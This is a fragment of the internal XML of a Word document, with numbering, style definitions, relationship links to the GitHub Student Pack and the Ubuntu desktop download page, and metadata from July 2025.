  <w:footnote w:type="continuationSeparator" w:id="1">
    <w:p w:rsidR="00273770" w:rsidRDefault="00273770" w:rsidP="009B3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8E3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F0E6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A4777"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DCDC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1297B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="30D6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76C24"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DE5E5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8400D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E0EC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9A440D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D2CE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B138ED"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3ECC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1729F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2576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244E32"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2DBC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A5B90"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C5A6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1B21BC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E840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B76AB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="992A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2C4E3D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A1FA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06142E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B158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CF0558"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6252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391D04"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="94EE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F62B1B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="77F202F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9"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="14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2A6"/>
    <w:rsid w:val="00273770"/>
    <w:rsid w:val="003517DC"/>
    <w:rsid w:val="00512366"/>
    <w:rsid w:val="006836E9"/>
    <w:rsid w:val="006D52E6"/>
    <w:rsid w:val="007C50BE"/>
    <w:rsid w:val="008A52A6"/>
    <w:rsid w:val="009B3843"/>
    <w:rsid w:val="00BC24F9"/>
    <w:rsid w:val="00C90926"/>
    <w:rsid w:val="00E249E1"/>
    <w:rsid w:val="00FC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DC"/>
    <w:rPr>
      <w:rFonts w:cs="Latha"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Heading2Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="008A5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2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52A6"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="0"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8A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styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="008A52A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A52A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5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52A6"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:kern w:val="0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NoSpacing">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="008A52A6"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Lath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2A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6836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843"/>
    <w:rPr>
      <w:rFonts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9B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843"/>
    <w:rPr>
      <w:rFonts w:cs="Lath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" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://education.github.com/pack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ubuntu.com/download/desktop" TargetMode="External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1F39-3B3D-4481-A821-0146780D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</dc:creator>
  <cp:lastModifiedBy>AYUSH</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-07-17T09:39:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-07-17T10:40:00Z</dcterms:modified>
</cp:coreProperties>
</file>